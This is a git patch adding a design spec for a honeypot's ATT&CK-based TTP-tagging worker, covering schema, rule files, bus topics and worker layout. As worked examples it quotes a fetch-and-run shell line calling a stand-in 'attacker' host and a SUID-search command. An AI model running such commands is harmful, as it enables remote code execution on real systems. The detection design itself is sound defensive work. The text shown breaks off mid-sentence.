From d09764beece23f0ab17e95bba721523ffa4cef92 Mon Sep 17 00:00:00 2001 From: anti Date: Fri, 1 May 2026 06:02:56 -0400 Subject: [PATCH] docs(ttp): add TTP tagging design (order-of-work step 1) Pre-implementation spec for the TTP-tagging worker. Defines the ATT&CK-canonical vocabulary, schema (ttp_tag + ttp_rule[_state]), bus topics, worker shape, lifter layering (rule-based v0, behavioral/intel/email v0.5, sigma/biometric later), confidence model, API surface, UI surface, observability, performance targets, and a CDD plan (Appendix E) that splits contracts from tests with xfail discipline so CI stays green between steps. --- development/TTP_TAGGING.md | 2864 ++++++++++++++++++++++++++++++++++++ 1 file changed, 2864 insertions(+) create mode 100644 development/TTP_TAGGING.md diff --git a/development/TTP_TAGGING.md b/development/TTP_TAGGING.md new file mode 100644 index 00000000..1610a9b2 --- /dev/null +++ b/development/TTP_TAGGING.md @@ -0,0 +1,2864 @@ +# TTP Tagging — Design + +**Status:** pre-implementation. This doc is the spec; code follows. + +**Roadmap pressure:** Detection & Intelligence §"TTPs tagging" in +`DEVELOPMENT.md`. Downstream consumer: campaign clustering already +demands `commands_by_phase_on_decky` (currently empty in production — +synthetic fixtures only). + +--- + +## Premise + +We collect a great deal of attacker telemetry — shell commands, HTTP +requests, FTP/SMB/Redis/Mongo ops, auth attempts, payload uploads, +**full SMTP messages with every header**, TLS/SSH fingerprints, scan +signatures, canary triggers. None of it is labelled with a +standardised behavioral vocabulary. A SOC analyst asking "which +identities exhibited T1110.003 (password spraying)?" or "which +sessions sent T1566 phishing?" cannot get an answer today. + +The roadmap line "TTPs tagging — Map observed behaviors to MITRE +ATT&CK techniques" needs a load-bearing definition before any code +is written. This document provides it. + +The deliverable is a **classifier worker** that consumes existing +telemetry and emits `(event, MITRE technique, confidence)` rows. It +is a pure derivation step — it adds labels, never new observations. + +## Vocabulary: ATT&CK is canonical, UKC is a view + +`decnet/clustering/ukc.py` already declares itself as the bridge to +the future TTP-tagging worker. That instinct is correct, but the +mapping is not 1:1: + +- UKC has 18 phases. ATT&CK has 14 tactics and ~600 (sub-)techniques. +- UKC merges some boundaries (`delivery` / `exploitation` / + `social_engineering`) that ATT&CK separates differently. +- ATT&CK has Resource Development (TA0042) as a tactic; UKC bundles + it pre-target. ATT&CK has no `objectives` tactic. +- SOC integrations (Wazuh, TheHive, Sigma rules, MITRE Navigator) + speak ATT&CK, not UKC. + +**Decision:** ATT&CK technique IDs are the canonical storage. UKC +remains a view derived from ATT&CK tactic via a static map at query +time. The campaign clusterer's `commands_by_phase_on_decky` +projection is computed by translating each tag's tactic to its UKC +equivalent. + +UKCPhase stays. It is not deleted. It becomes a projection, not a +source of truth. + +## Scope ladder: Observation → Identity → Campaign + +DECNET resolves attackers at three levels (`IDENTITY_RESOLUTION.md`): + +- **Observation** (`Attacker` row) — per-IP sighting; mutable; the + unit of *ingestion*. +- **Identity** (`AttackerIdentity` row) — recovered from rotation- + resistant signals (JA3, HASSH, payload hashes, eventually + keystroke biometrics on `SessionProfile`). +- **Campaign** (`Campaign` row) — coordinated identities. + +**TTPs anchor at the Observation layer for storage, surface at the +Identity layer for display, aggregate at the Campaign layer for +analytics.** This mirrors the pattern the rest of the schema +already follows: write at the lowest available level, denormalize +the parent for fast lookups, let the FK chain handle merges. + +Per-event tags get an `attacker_uuid` (the source row directly). +Cross-Observation signals (e.g. password spraying visible only when +50 rotated IPs are viewed as one Identity) cannot be anchored to a +single Attacker row — they are emitted as `source_kind = +"identity_rollup"` with `attacker_uuid = NULL` and `identity_uuid` +populated. + +Crucially: **biometric features (keystroke dynamics, etc.) live as +fields on `AttackerIdentity` / `SessionProfile`, NOT on `ttp_tag`.** +The TTP worker reads them via the `identity_uuid` / `session_id` +join when biometric lifters land. No biometric-specific columns +land on `ttp_tag` pre-emptively. (See "Forward-compat" below.) + +## One event maps to many techniques + +Load-bearing — every layer of the design must respect it. + +A single `find / -perm -u=s 2>/dev/null` shell command implicates: + +- **T1083** — File and Directory Discovery (the `find /` traversal) +- **T1548.001** — Setuid and Setgid (the `-perm -u=s` predicate + specifically searches for SUID binaries) + +A single `wget http://attacker/x.sh && chmod +x x.sh && ./x.sh` +implicates: + +- **T1105** — Ingress Tool Transfer (the `wget`) +- **T1059.004** — Unix Shell (the `./x.sh` execution) +- **T1222.002** — Linux File and Directory Permissions Modification + (the `chmod +x`) + +A single SMTP `MAIL FROM:` with 200 `RCPT TO` +recipients and a `From:` header pointing to a different domain +implicates: + +- **T1496** — Resource Hijacking (using our relay as infrastructure) +- **T1586.002** — Compromise Accounts: Email Accounts +- **T1566** — Phishing (mass send pattern) +- **T1036** — Masquerading (`From:` / `Return-Path:` mismatch) + +The design supports this at three levels: + +**Schema level.** `ttp_tag` is a join table. One row per +`(source_kind, source_id, technique_id, sub_technique_id, rule_id)` +— emphatically NOT keyed on `(source_kind, source_id)` alone. + +**Rule level.** A YAML rule may declare multiple techniques in one +`emits` block. + +**Engine level.** Multiple independent rules may fire on the same +event. Idempotency is at the deterministic-UUID level so re-running +on the same input is a no-op insert. + +## Non-goals + +- No attribution to named threat actors ("APT-29", "FIN7"). That is + a separate problem (campaign-level attribution) and conflating it + with TTP tagging is how every honeypot project drifts into + speculative attribution. +- No real-time response actions. TTPs feed the dashboard, webhooks, + and the campaign clusterer. They do not gate, block, or alter + decky behavior in v1. +- No ML/LLM classifier in v1. Rules first. +- No retroactive batch re-tagging at v1. The worker tags forward + from the day it ships; older rows stay untagged. A backfill CLI + command lands separately. +- No biometric-specific columns on `ttp_tag`. (See "Forward-compat".) + +## Forward-compat for unbuilt features + +DECNET will gain capabilities post-v1 (keystroke biometrics, HTTP/2 +fingerprint deepening, federation gossip, …). The user should not +be forced to migrate when those land. The right answer is **NOT** +to pre-bake columns for every speculative feature — that is the +inverse failure mode and clogs the schema with `null`s for fields +nobody can interpret. The right answer is: + +1. **Open `source_kind` discriminator.** It is a string, not an + enum. New kinds (`keystroke_session`, `biometric_match`, + `email_attachment`) appear in production data without DDL. +2. **Foreign keys to the appropriate parent rows.** `attacker_uuid`, + `identity_uuid`, `session_id`, `decky_id` are sufficient anchors + for any future signal we can foresee. +3. **Biometric features live where they belong** — on + `AttackerIdentity` and `SessionProfile`. The TTP worker reads + them via the existing FK joins. No `ttp_tag` schema change. + +If a future feature needs a new column on `ttp_tag`, the pre-v1 +"add it directly to SQLModel" rule applies until v1, after which +Alembic does the migration. We do not pay that cost speculatively. + +**Half-open `source_kind` — be honest about which layer is open.** +The `source_kind` discriminator is forward-compat *at the storage +layer*: SQLite / MySQL accept any string and the `ttp_tag` row +schema does not need a DDL change to absorb a new kind. + +It is NOT forward-compat at the *runtime* layer. Every lifter +declares `HANDLES: frozenset[str]` (E.1.6) and the +`CompositeTagger` skips events whose `source_kind` no lifter +claims. A new `source_kind` arriving in production with no lifter +update is a **silent drop**, not an error — the row never exists +because nothing produced it. The CDD test suite passes; no log +line fires; the analyst sees nothing. + +This is the standard "schema is forward-compat, code is not" trap; +naming it makes it impossible to forget. The mitigation is +operational, not architectural: + +1. New `source_kind` strings are added to a module-level + `KNOWN_SOURCE_KINDS: frozenset[str]` in + `decnet/ttp/base.py` at the same time as the producer ships. +2. The composite tagger logs a `WARNING` (rate-limited per kind) + when it sees a `source_kind` that is in `KNOWN_SOURCE_KINDS` + but no lifter claims — i.e., we expected someone to handle it. +3. A `source_kind` not in `KNOWN_SOURCE_KINDS` logs a single + `INFO` line per kind per process lifetime — "telemetry from a + future feature, no lifter yet, by design." Not an error. + +So: storage is open, runtime is closed-by-enumeration with an +observable bridge. Don't ship one without the other. + +## Decoupling: bus-driven, never a hard dependency + +The TTP worker has zero hard dependencies on other DECNET workers. +It consumes their outputs **opportunistically** — when a related +worker has produced data, TTP emits richer tags; when it hasn't, +TTP emits whatever it can from primary telemetry alone. No-SPOF is +load-bearing for the project as a whole, and the TTP worker is no +exception. + +The pattern, applied uniformly: + +1. **Bus-woken, never bus-blocked.** TTP subscribes to upstream + completion signals (`attacker.enriched`, `identity.formed`, + `credential.reuse.detected`). It WAKES on them. It does NOT + wait for them. If `attacker.session.ended` fires and intel has + not yet returned for this attacker, rule-based + behavioral + tags still emit. When intel arrives later, the + `attacker.enriched` event re-wakes the worker, intel_lifter + reads the now-populated row, intel-derived tags emit + retroactively. Idempotent UUIDs prevent duplicates. + +2. **No producer-side imports.** `decnet/ttp/impl/intel_lifter.py` + imports the `AttackerIntel` SQLModel (a data shape) but never + `decnet.intel.{abuseipdb, greynoise, feodo, threatfox}` (the + provider clients). If the entire intel package is removed from + the install, the TTP worker still starts and still emits all + non-intel tags. Same rule for biometric_lifter once the + keystroke ingester ships: it imports `SessionProfile`, never + the ingester. + +3. **Reads tolerate absence.** Every lifter that consults a + sibling-worker output handles `None`/empty as "no tags from this + source", never as an error. No `raise` paths on missing rows. + No `WARNING` log lines for absent intel — that's the normal + case for a freshly-observed attacker. + +4. **Worker registration is independent.** In + `web/worker_registry.py`, `ttp` and `enrich` are siblings. + Neither lists the other as a dependency. Both can run alone; + running both produces richer output. + +5. **API / UI degrade gracefully.** `/api/v1/ttp/*` returns + whatever tags exist. There is no "intel not available" error + path, no spinner blocked on enrichment, no UI banner saying + "tags incomplete because intel is offline". The dashboard shows + what's been tagged; if intel comes online later, more tags + appear without a refresh signal beyond the existing + `ttp.tagged` SSE stream. + +The same five rules apply to every future consumer of TTP outputs +(federation gossip, MISP export, SOC custom workers): subscribe to +`ttp.tagged`, tolerate absence, never block. + +## Order of work + +Strictly sequential. Each step lands on its own commit: + +1. **This design doc.** +2. **Telemetry inventory** — Appendix A below. Per-service event + catalogue with ATT&CK technique mappings and confidence bands. + This is the load-bearing data work; it cannot be skipped. +3. **Schema-only PR** — `ttp_tag` table, empty. New nullable bus + topic constants in `decnet/bus/topics.py` declared but unused. + Wiki: `Service-Bus.md` updated in the same PR. +4. **Read-only API** — `/api/v1/ttp/*` returning empty lists. API + shape locked; frontend can begin. +5. **Frontend** — `IdentityDetail` gains a "TTPs Observed" section + (primary surface). `AttackerDetail` gains a per-IP slice. + Empty states until the worker lands. +6. **Worker + store substrate** — + `decnet/ttp/{base.py, factory.py, impl/}` and + `decnet/ttp/store/{base.py, factory.py, impl/{filesystem,database}.py}` + following the provider-subpackage convention. `ttp` registered + in `web/worker_registry.py`. `./rules/ttp/` directory created + at projroot, empty. Bus subscriptions wired; no rules yet. +7. **Rule pack v0** — the first 45–60 highest-precision rules + (Appendix B). Ships at `./rules/ttp/`, one YAML file per + technique family. The `./rules/` directory at projroot is + created in this step (or the prior store-substrate step). +8. **Behavioral lifters** — derive techniques from existing + `AttackerBehavior` / `Credential` / `CredentialReuse` rows. +9. **Intel lifter** — opportunistic consumer of `AttackerIntel` + rows; bus-woken on `attacker.enriched`. Adds high-precision + tags from AbuseIPDB / GreyNoise / Feodo / ThreatFox verdicts + without becoming a dependency. (See "Decoupling" rules above.) +10. **Email lifter** — SMTP message-level rules; the largest single + engine class by signal volume. +11. **Sigma rule integration** — curated subset, reviewed by hand, + not bulk-imported. (See "Hard parts" §3.) +12. **Biometric lifters** — when the keystroke ingester populates + `SessionProfile`. Appendix D documents the integration point. + +Each step gets its own commit per project convention; tests in the +same commit as the code per project convention. + +--- + +## Why now, why not later + +**The signal is already collected.** SSH transcripts, HTTP logs, +SMTP messages with full headers, payload hashes, fingerprints, +credential captures all land in the DB today. Every day we delay +tagging, we accumulate untagged rows the analyst has to grep +manually. + +**Campaign clustering needs this.** The clusterer currently has an +empty `commands_by_phase_on_decky` in production — its +sophisticated phase-handoff edge weight is dormant because nothing +attaches phases to commands. TTP tagging is the missing producer. + +**Identity rollup needs this.** `decnet/profiler/identity_rollup.py` +aggregates per-Attacker rows into Identity-level profiles but has +no behavioral-vocabulary surface to expose. TTPs become the +"what does this Identity *do*?" answer. + +**SIEM/SOAR integration is bottlenecked on it.** Webhooks already +ship attacker events, but the receiving side (Wazuh, TheHive, +Shuffle) speaks ATT&CK. Without technique IDs in our payloads, the +correlation rules on the SOC side stay generic. + +--- + +## Schema + +### `ttp_tag` (new table) + +One row per (event × technique × rule) tuple. Pre-v1: add directly +to SQLModel; no `_migrate_*` helper. + +```python +class TTPTag(SQLModel, table=True): + __tablename__ = "ttp_tag" + + # Real RFC-4122 UUIDv5 string (36 hex+hyphens), deterministic + # over (source_kind, source_id, rule_id, rule_version, + # technique_id, sub_technique_id) under a fixed namespace. + # NOT a truncated SHA-256 — calling that "uuid" tanks + # schemathesis the moment a downstream router types it as + # UUID4. See `compute_tag_uuid()` below. + uuid: str = Field(primary_key=True) + + # Provenance — what was tagged. Discriminator + opaque ID. + source_kind: str # "command" | "http_request" + # | "auth_attempt" | "payload" + # | "fingerprint" | "scan" + # | "canary" | "canary_fingerprint" + # | "session" + # | "email" | "email_header" + # | "email_body" + # | "email_attachment" + # | "intel_verdict" + # | "identity_rollup" + # | "keystroke_session" (future) + # | "biometric_match" (future) + source_id: str # FK-ish; not a hard FK + # because source_kind varies + + # Scope anchors. attacker_uuid is nullable for identity-rollup tags + # whose signal is only visible across multiple Attacker rows. + attacker_uuid: Optional[str] = Field( + default=None, + foreign_key="attackers.uuid", + index=True, + ) + identity_uuid: Optional[str] = Field( + default=None, + foreign_key="attacker_identities.uuid", + index=True, + ) + session_id: Optional[str] = Field( + default=None, index=True, + ) + decky_id: Optional[str] = Field( + default=None, index=True, + ) + + # ATT&CK + tactic: str = Field(index=True) # "TA0001".."TA0043" + technique_id: str = Field(index=True) # "T1110" + sub_technique_id: Optional[str] = Field( + default=None, index=True, # "T1110.003" + ) + + # Confidence + evidence + confidence: float # [0.0, 1.0] + rule_id: str = Field(index=True) # rule that fired + rule_version: int # bumped on rule edits + + # Native JSON column, dialect-adaptive: SQLite stores as TEXT, + # MySQL as native JSON. No `default=` — every insert MUST + # supply evidence; a tag without evidence is a lifter bug. + # Type is `dict[str, Any]` so type-checkers can see structure; + # the per-source_kind shape contract is pinned in + # "Evidence shape contract" below — every lifter writes the + # same shape for the same source_kind, no per-lifter dialects. + evidence: dict[str, Any] = Field( + sa_column=Column(JSON, nullable=False), + ) + + # ATT&CK matrix release the tag was emitted against (e.g. + # "enterprise-v15.1", "ics-v15.1"). REQUIRED, never nullable + # and never Optional[str] — a tag without an ATT&CK release ID + # cannot be rendered deterministically in MITRE Navigator + # because technique IDs migrate between releases. Drop this + # invariant and the next "T1086 vs T1059.001" rename leaves + # tags pointing at IDs that no longer exist. The startup + # consistency check (Hard parts §8) refuses to boot the worker + # if the rule pack's release disagrees with the bundled matrix. + attack_release: str = Field(index=True) + + created_at: datetime = Field( + default_factory=lambda: datetime.now(timezone.utc), + index=True, + ) + + __table_args__ = ( + # At least one of attacker_uuid / identity_uuid must be set. + # MySQL <8.0.16 parses CHECK but ignores enforcement — + # the app-layer guard in __init__ covers that gap. + # SQLite, MySQL 8.0.16+, and Postgres honor it natively. + CheckConstraint( + "attacker_uuid IS NOT NULL OR identity_uuid IS NOT NULL", + name="ttp_tag_has_anchor", + ), + ) + + def __init__(self, **kwargs: Any) -> None: + # Belt-and-braces for MySQL <8.0.16 where CHECK is silently + # ignored. CRITICAL: this runs BEFORE super().__init__() — + # i.e. before Pydantic field validation. A Pydantic + # `@field_validator` would fire during model build and + # surface as a generic `ValidationError`, hiding the + # specific anchor-missing semantics behind a wall of + # validator output. Raising plain `ValueError` here keeps + # the failure type narrow and the message inspectable. + # The CDD test in E.2.1 asserts the exception type AND that + # both `"attacker_uuid"` and `"identity_uuid"` appear in + # str(exc). Do not "simplify" this into a generic assert + # or a Pydantic validator — the test is the trip-wire. + if ( + kwargs.get("attacker_uuid") is None + and kwargs.get("identity_uuid") is None + ): + raise ValueError( + "ttp_tag requires at least one of attacker_uuid / " + "identity_uuid; both NULL is not a valid anchor." + ) + super().__init__(**kwargs) +``` + +**Evidence shape contract.** `evidence` is JSON but not freeform. +Every lifter writes a known shape per `source_kind`; the contract +is enforced by `tests/ttp/test_evidence_shape.py` (E.2.1 +extension) which parametrizes over each lifter and asserts the +emitted dict matches a `TypedDict` declared in +`decnet/web/db/models/ttp.py` alongside `TTPTag`: + +```python +class CommandEvidence(TypedDict): + matched_tokens: list[str] + rule_pattern: str # regex source, not user input + +class IntelEvidence(TypedDict): + intel_uuid: str + provider: Literal["abuseipdb", "greynoise", "feodo", "threatfox"] + category: int | None + score: float # already normalized to [0.0, 1.0] + +class EmailEvidence(TypedDict): + body_sha256: str # hash, never raw body (PII rule §6) + matched_headers: list[str] # header NAMES, not values + rcpt_domain_set: list[str] # domains, not addresses + attachment_sha256s: list[str] + rcpt_count: int + +class CanaryFingerprintEvidence(TypedDict): + metric: str # "navigator_webdriver", "canvas_hash", … + matched_signature: str # signature ID, not raw fingerprint +``` + +Adding a new `source_kind` requires adding a TypedDict here AND a +test entry in `test_evidence_shape.py`. The PII discipline from +Hard parts §6 lives in the *type*, not in folklore — recipient +addresses cannot land in `EmailEvidence` because no field +accommodates them. See also "Half-open `source_kind`" below: the +storage layer accepts any string, but the lifter + evidence-shape +layer is closed by construction. + +**Querying inside `evidence` is backend-specific** — SQLite uses +`json_extract(evidence, '$.intel_uuid')`, MySQL uses +`evidence->>'$.intel_uuid'`. Predicates do NOT portably traverse +the JSON column; SQLite has no functional index inside JSON. If a +future endpoint wants "all tags from AbuseIPDB", we promote +`provider` to a real column on `ttp_tag` rather than relying on a +JSON dive. The JSON column is for storage-and-display, not for +indexed query paths. + +**Why both `attacker_uuid` AND `identity_uuid`.** Per-event tags +have both populated (`identity_uuid` is denormalized from +`Attacker.identity_id` at insert). Identity-rollup tags have only +`identity_uuid`. The denormalization mirrors how the rest of the +schema handles identity rollups — same playbook as +`AttackerBehavior` and the per-IP profile rollup. + +**At least one of `attacker_uuid` / `identity_uuid` MUST be set.** +A CHECK constraint in the table definition enforces this. There is +no such thing as a tag with neither anchor. + +**Identity merges/unmerges.** When the clusterer collapses two +Identities, the merge mechanic (per `IDENTITY_RESOLUTION.md`) +re-keys all `attacker_identities.uuid` references via FK. Tags +follow naturally. No bespoke ttp_tag merge code needed. + +**No FK on `source_id`.** Sources span multiple tables. A +discriminated union with hard FKs would mean N nullable columns; +not worth it. The tagger is the only producer; it never inserts a +tag with a source it didn't just read. + +**Retention: tags outlive sources.** The lack of an FK on +`source_id` means deleting the underlying payload / session / +attacker_command row does NOT cascade to `ttp_tag`. This is +deliberate — historical ATT&CK coverage stays queryable even +after the operator runs source-side retention. The trade-off: +a `source_id` may dangle; the evidence-pointer is informational +("this tag came from row X, which may no longer exist"), not a +join target the API trusts to resolve. + +The vacuum policy is opt-in, not automatic: + +- `decnet ttp vacuum --orphaned --since N days` walks `ttp_tag` + and drops rows whose `source_id` no longer resolves under their + `source_kind`. Off by default. Operators who want strict + tag-source pairing run it on a cron; operators who want + long-lived behavioral history don't. +- The `attacker_uuid` and `identity_uuid` FKs DO cascade + ON DELETE — deleting an Attacker drops its per-event tags + cleanly. This is the GDPR / "purge this attacker" path. + Identity-rollup tags (no attacker FK) survive the cascade and + remain anchored to the Identity until it too is deleted. + +This is stated, not silent. A tag's lifecycle is independent of +its source row's lifecycle by design. + +**Idempotency.** The tag `uuid` is a deterministic **UUIDv5** +derived from `(source_kind, source_id, rule_id, rule_version, +technique_id, sub_technique_id)` under the fixed namespace +`uuid.UUID("decnet:ttp_tag:v1")` (see `compute_tag_uuid()` for the +exact derivation). Replays are no-ops at the DB layer. The result +is a real RFC-4122 UUID — Pydantic / OpenAPI / schemathesis treat +it as `format: uuid`, downstream routers can type it as `UUID`, +and the column round-trips to native UUID types on backends that +have one. Truncated-SHA-256 strings dressed up as UUIDs would +silently fail UUID-typed validators; this avoids that trap. + +**Replay safety is a STATED PROPERTY, not an accident.** The +deterministic-UUID rule combined with `INSERT OR IGNORE` means the +worker can safely re-process the same source events any number of +times — crash recovery, backfill, manual re-runs all converge to +the same tag set. **A future contributor must not "optimise" the +UUID derivation by, say, adding `created_at` or a process PID to +the hash inputs**; that would silently break replay safety, and +the resulting bug ("why are we writing duplicate tags after +restart?") would take days to diagnose. The CDD test in E.2.2 +pins this property; do not weaken it. + +**Indexes:** +- `(identity_uuid, technique_id)` — primary query: "did this + Identity ever do T1110?" — IdentityDetail page hits this hard. +- `(attacker_uuid, technique_id)` — per-IP slice on AttackerDetail. +- `(technique_id, created_at)` — "all T1059.004 in the last week". +- `(session_id)` — session detail rollup. +- `(rule_id)` — rule-level audit / rollback. + +### Worked example + +Event: `attacker_command` row with `id=cmd_42`, content +`find / -perm -u=s 2>/dev/null`, attacker `att_99` (whose +`identity_id` resolves to `id_17`), session `sess_7`, decky +`decky_3`. + +Two rules fire: + +1. `find_recursive_root` rule (`R0014`, version `2`) — emits + `T1083`. +2. `suid_search` rule (`R0015`, version `1`) — emits both `T1083` + AND `T1548.001`. + +Resulting `ttp_tag` rows (abbreviated): + +| uuid | source_kind | source_id | attacker_uuid | identity_uuid | session_id | tactic | technique_id | sub_technique_id | confidence | rule_id | rule_version | +|------------|-------------|-----------|----------------|----------------|------------|--------|---------------|-------------------|------------|---------|--------------| +| `tag_a1b2…`| `command` | `cmd_42` | `att_99` | `id_17` | `sess_7` | TA0007 | T1083 | (null) | 0.75 | R0014 | 2 | +| `tag_c3d4…`| `command` | `cmd_42` | `att_99` | `id_17` | `sess_7` | TA0007 | T1083 | (null) | 0.85 | R0015 | 1 | +| `tag_e5f6…`| `command` | `cmd_42` | `att_99` | `id_17` | `sess_7` | TA0004 | T1548 | T1548.001 | 0.95 | R0015 | 1 | + +Three rows. Two distinct techniques; `T1083` appears twice because +two rules independently flagged it. The dashboard deduplicates for +display by `(identity_uuid, technique_id, sub_technique_id)` — but +the underlying rows stay distinct so a rule rollback removes its +contribution cleanly without touching the other. + +### Worked example — identity rollup + +Cross-IP password spraying detected by the credential lifter: +identity `id_17` has 7 Attacker rows (rotated IPs) all using +`Spring2024!` against different usernames across two deckies. + +Resulting tag (one row, no per-Attacker anchor): + +| source_kind | source_id | attacker_uuid | identity_uuid | tactic | technique_id | sub_technique_id | confidence | rule_id | +|---------------------|------------------------|----------------|----------------|--------|---------------|-------------------|------------|---------| +| `identity_rollup` | `cred_reuse_ev_4421` | (null) | `id_17` | TA0006 | T1110 | T1110.003 | 0.90 | R0003 | + +`source_id` here is the `CredentialReuse` row UUID, which is the +underlying evidence the lifter consulted. + +### Existing tables — additive only + +No alters in this PR. Specifically: + +- `AttackerBehavior.phase_sequence` already exists; it stays. The + TTP worker reads from it (behavioral lifters), but does not + write to it. +- `AttackerIdentity` will eventually grow biometric FK fields. That + is a separate PR sequence; `ttp_tag` does not pre-bake those. +- `SessionProfile` already exists empty; biometric lifters will + read it via `session_id` when populated. + +## Bus topics + +Declared in `decnet/bus/topics.py`; documented in +`wiki-checkout/Service-Bus.md` in the same PR. + +``` +ttp.tagged — one or more new tags written +ttp.rule.fired.{technique_id} — fine-grained subscribe; SIEM-friendly +ttp.rule.suppressed — rule fired but was confidence-clipped or rate-limited +ttp.rule.reloaded.{rule_id} — rule definition changed (filesystem edit + or DB-store sync); engine recompiled the rule +ttp.rule.state.{rule_id} — rule operational state changed (enabled / + disabled / clipped / TTL expired) +``` + +Both `ttp.rule.reloaded.*` and `ttp.rule.state.*` are **per-rule +events, never batched.** A 50-rule edit produces 50 reload events. +Subscribers that care about a specific rule subscribe to that +exact token; broad subscribers use `ttp.rule.reloaded.>`. The bus +does the fan-out — the producer never aggregates. + +`ttp.tagged` payload carries `attacker_uuid` (nullable), +`identity_uuid`, `session_id`, `tag_uuids` (list), and an aggregate +`techniques_added` (deduped list of technique IDs, for fast SIEM +correlation without a DB read). + +**Loop-prevention invariant — CANONICAL STATEMENT.** `ttp.tagged` +is published ONLY when the underlying `INSERT OR IGNORE` returned +a non-zero row count. Idempotent re-evaluations that produce zero +new tags publish ZERO events. This is load-bearing: a webhook +subscriber that re-triggers enrichment on `ttp.tagged` could +otherwise loop forever (enrich → `attacker.enriched` → +intel_lifter → idempotent insert returns 0 → `ttp.tagged` would +re-fire → loop). The CDD test in E.2.12 enforces this; do not +relax it. + +This is the single source of truth for the invariant. Other +sections in this doc (Hard parts §11 webhook blast radius, §E.2.12 +test plan) cross-reference back here rather than restating — +duplicating the rule across three locations is a maintenance +liability, not enforcement. + +## Worker shape + +`decnet/ttp/` mirrors `decnet/intel/` and `decnet/clustering/` — +provider-subpackage convention: + +``` +decnet/ttp/ + __init__.py + base.py # Tagger ABC; tag(event) -> list[TTPTag] + factory.py # get_tagger() reads DECNET_TTP_TAGGER_TYPE + worker.py # bus loop; persistence; dedup + store/ # pluggable rule store (provider-subpackage) + __init__.py + base.py # RuleStore ABC + factory.py # get_rule_store() reads DECNET_TTP_RULE_STORE_TYPE + impl/ + filesystem.py # default; reads ./rules/ttp/, inotify watches, + # state held in-process (lost on restart) + database.py # rules + state in DB; survives restart; + # multi-host swarm; master syncs from filesystem, + # workers tail DB + impl/ + rule_engine.py # consumes RuleStore; matches events + behavioral_lifter.py # AttackerBehavior → tags + credential_lifter.py # CredentialReuse → tags (identity-rollup) + email_lifter.py # SMTP message + headers + body + attachments + canary_fingerprint_lifter.py # browser fingerprint payload derivations + intel_lifter.py # AttackerIntel verdicts → tags (opportunistic) + identity_lifter.py # cross-Attacker rollups via identity_id join + sigma_adapter.py # (later) Sigma rule subset + biometric_lifter.py # (later) SessionProfile + AttackerIdentity +``` + +**Rule files live at `./rules/ttp/` (project root)** — visible to +the operator, git-tracked, editable without touching the Python +package. Mirrors how `./development/` already exposes spec / +profile artefacts to the user. One YAML file per technique family: + +``` +./rules/ttp/ + T1110_brute_force.yaml + T1059_command_and_scripting.yaml + T1046_network_service_discovery.yaml + T1566_phishing.yaml + T1496_resource_hijacking.yaml + ... +``` + +Registered in `web/worker_registry.py` as `ttp`. Bus-woken on: + +- `attacker.session.ended` — primary trigger; full session + available +- `credential.reuse.detected` — sub-technique disambiguation + (T1110.003 vs T1110.004); produces identity-rollup tags +- `attacker.observed` — wakes the tagger to apply low-latency rules + (active-scan signatures, fingerprint-based) +- `canary.{token_id}.triggered` — discrete events +- `identity.formed` / `identity.merged` — re-evaluate + identity-rollup rules with the new membership +- `attacker.enriched` — published by the `enrich` worker after a + successful intel pass; wakes the intel_lifter for the affected + attacker. **Opportunistic** — TTP never blocks on this. +- `email.received` (new bus signal — SMTP/SMTP-relay services + publish on full-message receipt; declared in this PR alongside + the worker) + +The worker is idempotent. Same `(source_kind, source_id, rule_id, +rule_version, technique_id, sub_technique_id)` → same tag UUID. + +--- + +## Tagging engines, layered + +### 1. Rule-based (v0 — ships first) + +YAML rule files, one per technique family. A single rule may emit +multiple techniques. + +```yaml +rule_id: R0015 +rule_version: 1 +name: suid_search +description: | + `find` invocation with -perm -u=s predicate — explicitly + searching for SUID binaries on the local filesystem. +applies_to: + - source_kind: command +match: + pattern: '\bfind\s+\S+.*-perm\s+(-u=s|-4000|/4000)\b' +emits: + - tactic: TA0007 + technique_id: T1083 + confidence: 0.85 + - tactic: TA0004 + technique_id: T1548 + sub_technique_id: T1548.001 + confidence: 0.95 +evidence_fields: [matched_groups, command_id] +``` + +Engine compiles rules at startup. Per event class, rules are +indexed by `applies_to.source_kind` so a single command does not +walk every rule. Aggregate rules (windowed, grouped) run on a +session-end pulse instead of per-event. + +**Why YAML, not Python:** rules need to be reviewable by humans +who aren't going to read the codebase. Sigma's success is exactly +this property. Code-as-rules ossifies fast. + +#### Hot-reload via store backend + +Rules and their *operational state* live in two separate planes, +combined at compile time: + +- **Definition** (immutable, version-controlled): the YAML file. + Sigma-compatible, no DECNET-specific extensions. Lives at + `./rules/ttp/` for the filesystem store, mirrored into the + `ttp_rule` table for the database store. +- **State** (mutable, operational): `RuleState` carrying + `enabled` / `disabled` / `clipped` plus optional + `confidence_max`, `expires_at`, `reason`, `set_by`, `set_at`. + Held in-process for the filesystem store; persisted in + `ttp_rule_state` for the database store. + +State is layered onto the parsed rule **after parsing**, never +embedded in the YAML. The engine sees a unified `CompiledRule +(definition, state)` tuple at evaluation time — single hash +lookup per event, free. + +**Why this split:** definition has slow lifecycle (git commit, +review, deploy); state has fast lifecycle (operator hits a +disable button, takes effect within seconds). Conflating them in +the YAML means "disable this rule for 4 hours" is a git commit; +keeping them separate means it's an API call. + +**Pluggable via `decnet/ttp/store/`** — see Worker shape above. +The default `FilesystemRuleStore` is right for single-host dev: +reads YAML files at projroot, inotify-watches the directory, +holds state in-memory (lost on restart, which is fine when the +operator is local). + +**Linux-only worker host (stated, not implied).** `inotify` is +Linux-specific. `FilesystemRuleStore` does **not** ship a +portable kqueue / FSEvents fallback — DECNET's deployment target +is Linux servers, and a polling fallback would be slower and +behave differently enough to be a bug-magnet. The store imports +`inotify_simple` (or `asyncinotify`) at module top-level; on +non-Linux systems the import raises and the worker fails fast at +boot rather than silently never reloading. macOS/Windows +developers running the test suite use the `DatabaseRuleStore` +(which has no inotify dependency) by setting +`DECNET_TTP_RULE_STORE_TYPE=database`. CI parametrizes both +backends on Linux and only the database backend on macOS — see +`tests/ttp/store/conftest.py`. The +`FilesystemRuleStore` factory checks `sys.platform == "linux"` +and raises a clear `RuntimeError` ("FilesystemRuleStore requires +Linux for inotify; use DatabaseRuleStore on this platform") +before any inotify import attempt, so the failure mode is a +one-line operator-readable message, not a stack trace deep in +the store init path. + +The `DatabaseRuleStore` is right for swarm: +master syncs filesystem changes into `ttp_rule`, workers tail the +DB, state in `ttp_rule_state` survives restart and propagates to +every worker. Pick via `DECNET_TTP_RULE_STORE_TYPE`. + +**Hot-reload mechanism:** + +1. Filesystem watch (or DB change notification) detects a per-file + change. +2. Store recompiles **only that rule**, atomically swaps it into + the engine's per-`source_kind` dispatch index. +3. Store publishes `ttp.rule.reloaded.{rule_id}` (one event, + 